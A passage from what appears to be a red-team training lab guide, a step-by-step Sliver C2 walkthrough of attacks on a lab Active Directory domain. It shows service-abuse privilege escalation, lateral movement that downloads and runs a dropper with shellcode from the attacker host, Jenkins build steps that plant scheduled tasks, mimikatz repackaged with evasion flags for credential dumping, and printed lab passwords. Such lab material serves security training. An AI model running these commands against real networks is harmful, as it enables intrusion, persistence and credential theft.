called SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at
startup.
[server] sliver (dcorp-std_https) > cd "C:\WebServer\Abyss Web Server"
[*] C:\WebServer\Abyss Web Server
[server] sliver (dcorp-std_https)> execute-assembly -P 2396 -p "C:\windows\sy

stem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "icacls a
byssws.exe"'

[*] Output:
abyssws.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
To enumerate modifiable Unquoted Service Path permissions, we can use Stracciatella to execute icacls
over the Path of the binary as follows.
[server] sliver (dcorp-std_https)> execute-assembly -P 2396 -p "C:\windows\sy
stem32\taskhostw.exe" -t 45 '/mnt/c/AD/Tools/Stracciatella.exe' '-c "icacls C
:\WebServer"'
[*] Output:
C:\WebServer NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
S
Successfully processed 1 files; Failed processing 0 files

Elevate privileges to local administrator
Using Remote-sc-*
We will be abusing the Modifiable Services part for privilege escalation in two ways.
We will first abuse the AbyssWebServer service to add dcorp\studentX as a local administrator.
We will be using Sliver’s remote-sc-* commands to start, stop and reconfigure the AbyssWebServer
service the same way as the sc.exe command. Since Sliver’s remote-sc-* commands uses a COFF-
Loader via Beacon Object files all execution is performed within the current Sliver beacon process.
Begin by stopping the target service using the remote-sc-stop command.
[server] sliver (dcorp-std_https) > remote-sc-stop -h
stop service on a windows based system
Usage:
======
remote-sc-stop [flags] hostname service_name
Args:
=====
hostname string hostname to stop service on use "" for local system
service_name string name of service to stop
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)
[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "" 'AbyssWebServer'

[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname:
servicename: AbyssWebServer
SUCCESS.
Rechange the configuration of the AbyssWebServer service to add the current user (dcorp\studentX) to
the local administrator group.
[server] sliver (dcorp-std_https) > remote-sc-config -h
configure an existing service
Usage:
======
remote-sc-config [flags] hostname service_name binpath error_mode start_mod
e
Args:
=====
hostname string hostname to modify service on use "" for local syst

em
service_name string name of service to configure
binpath string New binary path for service
error_mode int new error mode for service binary
0=ignore 1=normal 2=severe 3=critical
start_mode int start mode for service
2=auto 3=demand 4=disable
Flags:
======
[server] sliver (dcorp-std_https) > remote-sc-config -t 100 "" 'AbyssWebServe

r' 'C:\windows\system32\net.exe localgroup administrators dcorp\studentX /add
' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
binpath: C:\windows\system32\net.exe localgroup administrators dcorp\st
udentX /add
ignoremode: 1
startmode: 2
SUCCESS.
Restart the AbyssWebServer service to add dcorp\studentX as a local administrator.

[server] sliver (dcorp-std_https) > remote-sc-start -h
Start service on a windows-based system
Usage:
======
remote-sc-start [flags] hostname service_name
Args:
=====
hostname string hostname to start service on use "" for local syste
m
service_name string name of service to start
Flags:
======
[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "" 'AbyssWebServer'

[*] Got output:
stop_service:
hostname:

SUCCESS.
[server] sliver (dcorp-std_https) > remote-sc-start -t 100 "" 'AbyssWebServer

'
[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service failed: 41D
start_service:
hostname:
StartServiceA failed (41D)
An alternative to abuse the AbyssWebServer service to get a high integrity persistent Sliver session is to
upload a Sliver service session implant replacing the original one in the service configuration.
Host the shellcode using HFS / a python3 webserver.

Reconfigure the service as follows to execute the NtDropper along with the previously generated https
shellcode.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 45 "" AbyssWebServer
[*] Got output:
stop_service:
hostname:
Service is already stopped.
SUCCESS.
[server] sliver (dcorp-std_https) > remote-sc-config -t 50 "" 'AbyssWebServer

' 'C:\Windows\System32\cmd.exe /c start /b C:\AD\Tools\NtDropper.exe 172.16.1
00.X dcorp-std_https.bin' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
binpath: C:\Windows\System32\cmd.exe /c start /b C:\AD\Tools\NtDropper.
exe 172.16.100.X dcorp-std_https.bin
ignoremode: 1
startmode: 2
SUCCESS.

Start the AbyssWebServer service to get a High Integrity persistent session. (Runs each time on startup)
[server] sliver (dcorp-std_https) > remote-sc-start -t 45 "" AbyssWebServer
[*] Got output:
start_service:
hostname:
SUCCESS.
[*] Session f16e87cb dcorp-std_https - 172.16.100.X:55852 (dcorp-stdX) - wind

ows/amd64 - Fri, 05 Jan 2024 05:29:09 PST

Identify where studentX has local administrative access
Using LACheck
Let us now use LACheck to enumerate local admin access as dcorp\studentX. LACheck along with other
enumeration capabilities allows to check Local Admin Access via Winrm, SMB and WMI/RPC using the
winrm smb rpc arguments. We only check local admin access over all computers in the domain other
than the DC to avoid logs on the DC via the argument /ldap:servers-exclude-dc. We will enumerate local
admin access for all 3 protocols as follows.
ystem32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:serv
ers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'
[*] Output:
[+] Parsed Aguments:
rpc: True
smb: True
winrm: True
/bloodhound: False
/domain: dollarcorp.moneycorp.local
/ldap: servers-exclude-dc
/threads: 10
/user: studentX@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled
servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 26
Status: (0.00%) 0 computers finished (+0) -- Using 22 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@
dollarcorp.moneycorp.local
Status: (96.15%) 25 computers finished (+25 0.8333333)/s -- Using 27 MB RAM
[+] Finished enumerating hosts

Command Execution using WMI
CIMplant is a C# port of WMImplant which uses of either CIM/WMI to query remote systems. It can use
provided credentials or the current user’s session. Test command execution using CIMplant modules. In
this case we use the basic_info module.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/CIMplant.exe' '-s dcorp-adminsr
v -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c basic_info
'
[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)
[+] Connecting to remote CIM instance using studentX...

[+] Connected
[+] Results from basic_info:
Computer Name : DCORP-ADMINSRV

Windows Directory : C:\Windows
Operating System : Microsoft Windows Server 2022 Datacenter
Version : 10.0.20348
Manufacturer : Microsoft Corporation
Number of Users : 11
Registered User : Windows User
[+] Successfully completed basic_info command

Execution time: 0 Seconds
CIMPlant:
-s remote IP
-u username
-p password
-c module
Use CIMplant to query the language mode of dcorp-adminsrv by using the command_exec module as
follows.
v -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c command_ex
ec --execute "$ExecutionContext.SessionState.LanguageMode"'

[*] Output:

[+] Connected
[+] Results from command_exec:
[+] Executing command: $ExecutionContext.SessionState.LanguageMode

--------------------------------------------------------
ConstrainedLanguage
[+] Successfully completed command_exec command

Since it has Constrained Language mode enabled, this is usually accompanied by Applocker. Let us
enumerate the Applocker Rules on the host.
v -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c command_ex
ec --execute "Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\Sr
pV2 -Recurse"'
[*] Output:

[+] Connected
[+] Results from command_exec:
[+] Executing command: Get-ChildItem -Path HKLM:Software\Policies\Microsoft\W

indows\SrpV2 -Recurse
--------------------------------------------------------
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Appx
Dll
Exe EnforcementMode : 1
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe
Name Property
---- --------
5a9340f3-f6a7-4892-84ac-0fffd5 Value : <FilePublisherRule Id="5a9340f3-f6a7-4
892-84ac-0fffd51d9584" Name="Signed by 1d9584 O=MICROSOFT CORPORATION,L=REDMO
ND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0"
Action="Allow"><Conditions> <FilePublisherCondition PublisherName="O=MICROSOF
T CORPORATION, L=REDMOND,S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><
BinaryVersionRange LowSection="*" HighSection="*"/></FilePublisher Condition>
</Conditions></File PublisherRule>

Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Msi
Script EnforcementMode :
[....snip....]
[+] Successfully completed command_exec command


Command Execution using Winrm
It is possible to perform similar command execution using the winrm BOF. Perform basic command
execution using winrm as follows.
[server] sliver (dcorp-std_https) > winrm -- -i dcorp-adminsrv -u studentX -p
JPIzbuWHdSfq9NFr -c whoami
[*] Successfully executed winrm
[*] Got output:
[+] Arguments processed
hostname: dcorp-adminsrv
command: whoami
username: studentX
password: JPIzbuWHdSfq9NFr
dcorp\studentX
Lateral Movement using Sa-sc-enum and Scshell

Let us now create a pivot listener on dcorp-stdX to move laterally and get a sliver session on dcorp-
adminsrv. Sliver allows smb and tcp sessions for lateral movement.
Create a tcp pivot listener in the current dcorp-stdX session (dcorp-std_https) as follows.
[server] sliver (dcorp-std_https) > pivots tcp --lport 8080
[*] Started tcp pivot listener :8080 with id 1
[server] sliver (dcorp-std_https) > pivots

ID Protocol Bind Address Number Of Pivots
=== ========== ============== ==================
1 TCP :8080 0
Generate the corresponding Sliver implant service executable for the tcp listener on dcorp-stdX.
Make sure that port 8080 is allowed or firewall is disabled on dcorp-stdX.
[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -f
shellcode -e --name dcorp-adminsrv_tcp
[*] Generating new windows/amd64 implant binary

[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-adminsrv_tcp.bin
Setup a python3 / HFS webserver on port 80 from a new Ubuntu prompt to deliver all tools, shellcode


Back in the Sliver dcorp-stdX session, download the NtDropper onto dcorp-adminsrv remotely using
winrm / CIMplant.
[server] sliver (dcorp-std_https) > winrm -- -i dcorp-adminsrv -u studentX -p
JPIzbuWHdSfq9NFr -t 300 -c 'curl --output C:\windows\temp\NtDropper.exe --ur
l http://172.16.100.X/NtDropper.exe'
We can now use psexec (not opsec friendly) / scshell to gain a session implant bypassing Applocker
on the target. To do so find an abusable service using the sa-sc-enum BOF as follows.
[server] sliver (dcorp-std_https) > sa-sc-enum dcorp-adminsrv
[snip]
SERVICE_NAME: ssh-agent
DISPLAY_NAME: OpenSSH Authentication Agent
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
SERVICE_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Windows\System32\OpenSSH\ssh-agen
t.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenSSH Authentication Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
RESET_PERIOD (in seconds) : 0
REBOOT_MESSAGE :
COMMAND_LINE :
The service has not registered for any start or stop triggers.
The ssh-agent
We could target the ssh-agent service since we have administrative privileges over the target.
Before doing so if the service isn’t already stopped, make sure to stop it using remote-sc-stop as
follows.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "dcorp-adminsrv" 's
sh-agent'

[*] Got output:
stop_service:
hostname: dcorp-adminsrv

servicename: ssh-agent
SUCCESS.
We could leverage scshell instead of psexec as schshell relies on ChangeServiceConfigA to modify

the service configuration, execute the tasked command/service (in this case to leverage the
NtDropper to download and execute our generate shellcode) and restore the service configuration
once done, hence is more opsec safe than psexec.
[server] sliver (dcorp-std_https) > scshell -t 80 dcorp-adminsrv ssh-agent 'C
:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\NtDropper.exe 172.16.1
00.10 dcorp-adminsrv_tcp.bin'
[*] Successfully executed scshell (coff-loader)

[*] Got output:
Trying to connect to dcorp-adminsrv
Using current process context for authentication. (Pass the hash)
SC_HANDLE Manager 0x0000023369191030
Opening ssh-agent
SC_HANDLE Service 0x0000023369190eb0
LPQUERY_SERVICE_CONFIGA need 0x0000014c bytes
Original service binary path "C:\Windows\System32\OpenSSH\ssh-agent.exe"
Service path was changed to " C:\Windows\System32\cmd.exe /c start /b C:\Wind
ows\Temp\NtDropper.exe 172.16.100.10 dcorp-adminsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\System32\OpenSSH\ssh-agent.exe"
[*] Session 8f564dcc dcorp-adminsrv_tcp - 172.16.100.X:50152->dcorp-std_https

-> (dcorp-adminsrv) - windows/amd64 - Tue, 16 Jan 2024 06:26:26 PST

Abuse Jenkins to get admin access on the dcorp-ci server
Using Process Injection to invoke remote shellcode
We have a Jenkins instance on dcorp-ci (http://172.16.3.11:8080) which can be enumerated using
nmap in a standard WSL Ubuntu prompt. We use the -sC and -sV flags for script and version
enumeration along with the -Pn flag to skip the host discovery phase.
wsluser@dcorp-studentX:~$ nmap 172.16.3.11 -p 8080 -sC -sV -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 13:35 EDT
Nmap scan report for 172.16.3.11
Host is up (0.23s latency).
PORT STATE SERVICE VERSION

8080/tcp open http Jetty 10.0.11
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
|_http-title: Dashboard [Jenkins]
Service detection performed. Please report any incorrect results at https://n

map.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds
To be able to execute commands on the Jenkins server without admin access we must have privileges to
configure builds.
On Chrome / edge, Visit http://172.16.3.11:8080. We find a Jenkins instance here.
Clicking on the people tab we find a bunch of usernames. These usernames could be used for a brute
force/password guessing attack to gain authenticated access.

Since Jenkins does not have a password policy, passwords can be easy to guess or can be abused from
publicly available password dictionaries. Guessing the username and password as builduser:builduser
we have access to the jenkins panel.

The user builduser has the ability to configure builds and add build steps which will help us in executing
batch commands.
Select a project to configure a build for: In this case we select Project1
Next select configure to configure Project1.
Back in the dcorp-stdX Sliver session, reuse or create a new tcp pivot listener on dcorp-stdX listening on
port 8080.

[server] sliver (dcorp-std_https) > pivots

ID Protocol Bind Address Number Of Pivots
=== ========== ============== ==================
1 TCP :8080 0
Generate the corresponding Sliver implant executable for the tcp listener on dcorp-stdX. Make sure
that port 8080 is allowed or firewall is disabled on dcorp-stdX.
shellcode -e -N dcorp-ci_tcp
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-ci_tcp.bin
Setup a python3/HFS webserver on port 80 from a new Ubuntu prompt to deliver all tools, shellcode

Continuing with Jenkins abuse, Configure the project to add a build step --> Execute Windows batch
command to execute schedule tasks to download and execute NtDropper with the above generated
shellcode.
Begin by creating a schedule task (DownloadNtDropper) to download the NtDropper file from our
hosted webserver, enter this in the Execute Windows batch command window and select Save.
schtasks /create /tn "DownloadNtDropper" /tr "C:\Windows\System32\cmd.exe /c
start /b curl http://172.16.100.X/NtDropper.exe -o C:\Windows\Temp\NtDropper.
exe" /sc ONSTART

Click on Build Now to build the project and then view the output by selecting the build --> Console
Output.

Next, click on Back to project and click on Configure to recreate a new build to create a schedule task
(RunNtDropper) to execute the NtDropper along with our shellcode and finally click Save.
schtasks /create /tn "RunNtDropper" /tr "C:\Windows\System32\cmd.exe /c start
/b C:\Windows\Temp\NtDropper.exe 172.16.100.X dcorp-ci_tcp.bin" /sc ONSTART
Click on Build Now and view the Console Output as below.
We can finally execute both these schedule tasks to get a pivot session on dcorp-ci.
Reconfigure another build as above to first execute the DownloadNtDropper schedule task.
schtasks /run /tn "DownloadNtDropper"

Finally execute the RunNtDropper schedule task to run the NtDropper to download and execute our
dcorp-ci_tcp pivot shellcode.
schtasks /run /tn "RunNtDropper"

After a few minutes, a new tcp pivot session is spawned on dcorp-ci connecting back to the tcp pivot
listener on dcorp-stdX.
[*] Session ad354cf5 DCORP-CI_TCP - 172.16.100.X:55156->dcorp-std_https-> (dc
orp-ci) - windows/amd64 - Thu, 16 Jan 2024 09:56:54 EDT
[server] sliver (dcorp-std_https) > sessions
ID Name Transport Remote Address Hostname Username Operating S

ystem Locale Last Message Health
========== ==================== =========== =========== ===========
ad354cf5 DCORP-CI_TCP pivot 172.16.100.X:55156->dcorp-std_https->

dcorp-ci dcorp\ciadmin windows/amd64 Thu, 16 Jan 20
24 09:56:54 EDT [ALIVE]
7ffc8893 dcorp-std_https http(s) 172.16.100.X:55156

dcorp-stdX dcorp\studentX windows/amd64 Thu, 16 Jan
2024 09:57:02 EDT [ALIVE]
The C2 traffic flow would look like this:

dcorp-stdX (https) --> dcorp-ci (tcp)

Setup BloodHound and identify a machine where studentX has local administrative access.
BloodHound Enumeration
Using SharpHound.exe
BloodHound uses neo4j graph database, so that needs to be setup first.
Note: Exit BloodHound once you have stopped using it as it uses good amount of RAM. You may also like
to stop the neo4j service if you are not using BloodHound.
We need to install the neo4j service. Unzip the archive C:\AD\Tools\neo4j-community-4.1.1-

windows.zip
Install and start the neo4j service as follows:

C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin>neo4j.bat
install-service
Neo4j service installed
C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin>neo4j.bat
start
Once the service gets started browse to http://localhost:7474

Enter the username: neo4j and password: neo4j. You need to enter a new password. Let's use
BloodHound as the new password.
Now, open BloodHound from C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64 and

provide the following details:
URL: bolt://localhost:7687
Username: neo4j
Password: BloodHound

In the dcorp-stdX session, use the SharpHound.exe binary (C# Bloodhound ingestor binary) to create the
enumerated BloodHound compatible zip file along with the -c All flag to perform all checks and gather
data.
NOTE: It is also possible to use bloodhounds --stealth option to perform enumeration in a more opsec
safe way by not querying target DCs.
[server] sliver (dcorp-std_https) > cd C:\\AD\\Tools\\Sliver
[*] C:\AD\Tools\Sliver

ystem32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/SharpHound.exe' '--ldapusernam
e studentX --ldappassword JPIzbuWHdSfq9NFr -c All'
[*] Output:
2024-01-10T04:50:49.3433951-08:00|INFORMATION|This version of SharpHound is c
ompatible with the 5.0.0 Release of BloodHound
[.....snip...]
2024-01-10T04:52:08.8184100-08:00|INFORMATION|Saving cache with stats: 318 ID
to type mappings.
322 name to SID mappings.
2 machine sid mappings.
6 sid to domain mappings.
0 global catalog mappings.

2024-01-10T04:52:08.8343075-08:00|INFORMATION|SharpHound Enumeration Complete
d at 4:52 AM on 1/10/2024! Happy Graphing!
[server] sliver (dcorp-std_https) > ls *bloodhound.zip
C:\AD\Tools\Sliver (3 items, 97.3 KiB)

======================================
-rw-rw-rw- 20240110044410_BloodHound.zip 32.9 KiB Wed Jan 9 10:13:32 -0800
2024
NOTE: It is possible to exfiltrate and download the generated BloodHound compatible zip file from a
remote system using the download command in Sliver.
Import this .zip into Bloodhound via dragging and dropping.
As an alternative it is also possible to use the sharp-hound-3 alias by installing it from Sliver’s armoury
using the armory install sharp-hound-3 command.

Using LACheck
A suitable means for computer enumeration and in-memory execution is using LACheck’s /bloodhound
module along with the /socket module to remotely exfiltrate the generated zip directly over to our host
TCP socket.
Execute LACheck to perform enumeration over all computers in the dollarcorp.moneycorp.local domain
and the /bloodhound option to set bloodhound enumeration to True.
NOTE: It is possible to exfiltrate and download the generated .json files over a TCP socket by using the
/socket option.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'smb rpc wirnm /bl
oodhound /domain:dollarcorp.moneycorp.local /user:studentX@dollarcorp.moneyco
rp.local /ldap:all'
[*] Output:
rpc: True
smb: True
winrm: False
/bloodhound: True
/dc:
/edr: False
/logons: False
/registry: False
/services: False
/ldap: all
/ou:
/socket:
/targets:
/threads: 25
/verbose: False
[+] Performing LDAP query against Global Catalog for all enabled computers wi
th "primary" group "Domain Computers"...
[winrm] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@
[+] Gathering Enabled Users...
Compressing zip files to zaascrqp.ccj
Password for Zip file is qu5vxg1w1np unzip files manually to upload to interf
ace

Analysis using Web UI of BloodHound CE
We can use the data with the same Collectors with BloodHound CE. As BloodHound CE consumes high
amounts of RAM, in the lab, you only have Read-only access to a shared BloodHound CE -
https://crtpbloodhound-altsecdashboard.msappproxy.net/
Provide the following credentials to the Microsoft login page:

Username: crtpreader@altsecdashboard.onmicrosoft.com
Password: ARe@dOnlyUsertol00kAtSecurityDashboard!
This would bring you to the BloodHound CE login page. Provide the same set of credentials as above to
the BloodHound login page and you will be able to access the UI.

Always double-check the credentials in the lab portal - https://adlab.enterprisesecurity.io/
This instance of BloodHound CE already has the database populated. Feel free to play with the data!
To solve the task in the Learning Objective, proceed as follows.

In the Web UI, click on Cypher -> Click on the Folder Icon -> Pre-Built Searches -> Active Directory ->
(Scroll down) -> Shortest paths to Domain Admins
Issue with Derivate Local Admin and BloodHound 4.2.0

The latest version of BloodHound (4.2.0) does not show Derivate Local Admin edge in GUI. The last
version where it worked was 4.0.3. It is present in the Tools directory as BloodHound-4.0.3_old. You can
use it the same way as above.
Make sure to use the collector from BloodHound-4.0.3_old with UI in BloodHound-4.0.3_old. These are
not compatible with BloodHound 4.2.0.
ystem32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/BloodHound-4.0.3_old/BloodHoun
d-master/Collectors/SharpHound.exe' '--ldapusername studentX --ldappassword J
PIzbuWHdSfq9NFr -c All'

Identify where studentX has local administrative access
To Identify where studentX has local admin access we can begin by searching for the user in the Search
for a node field.
Select the studentX node by clicking on it and then select the Derivative Local Admin Rights tab to see
that it has local admin rights on dcorp-adminsrv (press Ctrl to toggle labels).

Identify a machine in the target domain where a Domain Admin session is available.
Compromise the machine and escalate privileges to Domain Admin
• Using access to dcorp-ci
• Using derivative local admin
Identify a Domain Admin session

Using LACheck
Access the dcorp-ci pivot session as created earlier in L0-5.
[*] Session 07e043d8 dcorp-ci_tcp - 172.16.100.X:49752->dcorp-std_https-> (dc
orp-ci) - windows/amd64 - Thu, 11 Jan 2024 02:21:24 PST
[server] sliver (dcorp-std_https) > sessions -i 07e043d8

[*] Active session dcorp-ci_tcp (07e043d8)
Enumerate running process’s using the ps command. Use the -c option to print commandline arguments
and the -o option to filter for process’s running under the dcorp\ciadmin user.
[server] sliver (dcorp-ci_tcp) > ps -c -o 'dcorp\ciadmin'
====== ====== =============== ======== ============== =========
[......snip......]
2132 612 dcorp\ciadmin x86_64 jenkins.exe
0
2628 2132 dcorp\ciadmin x86_64 C:\Program Files (x86)\Common Files\Or

acle\Java\javapath\java.exe : "java" -Xrs -Xmx256m -Dhudson.lifecycle=hudson.
lifecycle.WindowsServiceLifecycle -jar "C:\Program Files (x86)\Jenkins\jenkin
s.war" --httpPort=8080 --webroot="C:\Program Files (x86)\Jenkins\war" 0
2176 2628 dcorp\ciadmin x86_64 C:\Windows\system32\conhost.exe : \??\

C:\Windows\system32\conhost.exe 0x4
1364 1020 dcorp\ciadmin x86_64 C:\Windows\System32\rdpclip.exe : rdpc
lip
[!] Security Product(s): Windows Defender

For fork and run execution using execute-assembly let us execute java under the Jenkins process to
blend in.
Let us use LACheck again to return logged on users on a host using the /logons option using smb, winrm
and rpc. We exclude the DC for enumeration to avoid creating logs on the DC and enumerate only
servers using the /ldap:servers-exclude-dc option.
[server] sliver (dcorp-ci_tcp) > execute-assembly -P 2628 -p 'C:\Program File
s\Common Files\Oracle\Java\javapath\java.exe' -t 180 '/mnt/c/AD/Tools/LACheck
.exe' 'winrm /ldap:servers-exclude-dc /logons /threads:10 /domain:dollarcorp.
moneycorp.local'
[*] Output:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/edr: False
/logons: True
/registry: False
/services: False
/ou:
/socket:
/targets:
/threads: 10
/user: ciadmin
/verbose: False
[WinRM] Admin Success: DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL as ciadmin
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\svcadmin 1/11/2024 4:
16:15 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\ciadmin 1/11/2024 4:1
9:40 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - DCORP-MGMT\SQLTELEMETRY 1/1
1/2024 4:16:15 AM (ciadmin)
We find that dcorp\ciadmin has local admin access over dcorp-mgmt and there is a domain admin
session - dcorp\svcadmin on dcorp-mgmt along with other user sessions such as dcorp\mgmtadmin.

Escalate privileges to Domain Admin: using dcorp-ci
Using Remote-sc-*, Sa-sc-enum, Scshell and PEzor
When performing Credential Looting interacting/injecting into the LSASS process is a major IOC, hence
techniques have evolved to create a minidump of the LSASS process, exfiltrate it and later parse the
LSASS minidump using pypykatz/mimikatz on our host VM.
For our lab, we will focus on Credential Looting techniques by directly interacting with LSASS via
executing C# mimikatz alternatives like SharpKatz.
Start a tcp pivot listener in the dcorp-ci session.

[server] sliver (dcorp-ci_tcp) > pivots tcp --lport 443
Generate a corresponding implant for dcorp-mgmt.

[server] sliver (dcorp-ci_tcp) > generate --tcp-pivot 172.16.3.11:443 -f shel
lcode -e -N dcorp-mgmt_tcp

[*] Build completed in 57s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-mgmt_tcp.bin
Let us now enumerate remote services to abuse using the sa-sc-enum command (BOF).
[server] sliver (dcorp-ci_tcp) > sa-sc-enum dcorp-mgmt
[*] Successfully executed sa-sc-enum (coff-loader)

[*] Got output:
[.............snip..............]
SERVICE_NAME: wmiApSrv
DISPLAY_NAME: WMI Performance Adapter
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
ERROR_CONTROL : 1 NORMAL

BINARY_PATH_NAME : C:\Windows\system32\wbem\WmiApSrv.ex
e
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WMI Performance Adapter
DEPENDENCIES :
SERVICE_START_NAME : localSystem
REBOOT_MESSAGE :
COMMAND_LINE :
FAILURE_ACTIONS : RESTART -- Delay = 120000 millisecon
ds
ds
FAILURE_ACTIONS : NONE -- Delay = 0 milliseconds
Let’s target the wmiApSrv service to modify the binary executed to our NtDropper. Upload the
NtDropper binary as follows (Modifiable service binary permissions).
NOTE: Stop the wmiApSrv service before trying execution using scshell.
[server] sliver (dcorp-ci_tcp) > remote-sc-stop -t 40 dcorp-mgmt wmiApSrv

[*] Got output:
stop_service:
hostname: dcorp-mgmt
servicename: wmiApSrv
SUCCESS.
[server] sliver (dcorp-ci_tcp) > upload -t 180 '/mnt/c/AD/Tools/NtDropper.exe

' '\\dcorp-mgmt\c$\Windows\Temp\NtDropper.exe'
[*] Wrote file to \\dcorp-mgmt\c$\Windows\Temp\NtDropper.exe
We can use the scshell BOF as before for lateral movement.

[server] sliver (dcorp-ci_tcp) > scshell -t 80 dcorp-mgmt wmiApSrv 'C:\Window
s\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X dco
rp-mgmt_tcp.bin'

[*] Got output:
Trying to connect to dcorp-mgmt
[snip]
[*] Session 945ae759 dcorp-mgmt_tcp - 172.16.100.X:49752->dcorp-mgmt_tcp->dco

rp-ci_tcp-> (dcorp-mgmt) - windows/amd64 - Thu, 11 Jan 2024 05:28:27 PST

We can now perform credential dumping techniques to retrieve dcorp\ciadmin and other credentials.
Let’s leverage PEzor to convert mimikatz.exe into donut shellcode with appropriate mimikatz arguments
for Credential Dumping ( “sekurlsa::ekeys”) repackaged into a .NET x86-x64 executable compatible with
Slivers execute-assembly and a few evasive techniques incorporated such as -sgn , -unhook, -antidebug
and -fluctuate=NA.
Spawn a new Ubuntu WSL prompt and execute PEzor.sh to convert mimikatz.exe into a repackaged .NET
x86-x64 executable:
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/PEzor/
wsluser@dcorp-studentX:/mnt/c/AD/Tools/PEzor$ sudo su
root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# ./PEzor.sh -unhook -antidebug -flu
ctuate=NA -format=dotnet -sleep=5 /mnt/c/AD/Tools/PEzor/mimikatz.exe -z 2 -p
'"privilege::debug" "token::elevate" "sekurlsa::ekeys" "exit"'
________________
< PEzor!! v3.3.0 >
----------------
\ / \ //\
\ |\___/| / \// \\
/0 0 \__ / // | \ \
/ / \/_/ // | \ \
@_^_@'/ \/_ // | \ \
//_^_/ \/_ // | \ \
( //) | \/// | \ \
( / /) _|_ / ) // | \ _\
( // /) '/,_ _ _/ ( ; -. | _ _\.-~ .-~~~^-.
(( / / )) ,-{ _ `-.|.-~-. .~ `.
(( // / )) '/\ / ~-. _ .-~ .-~^-. \
(( /// )) `. { } / \ \
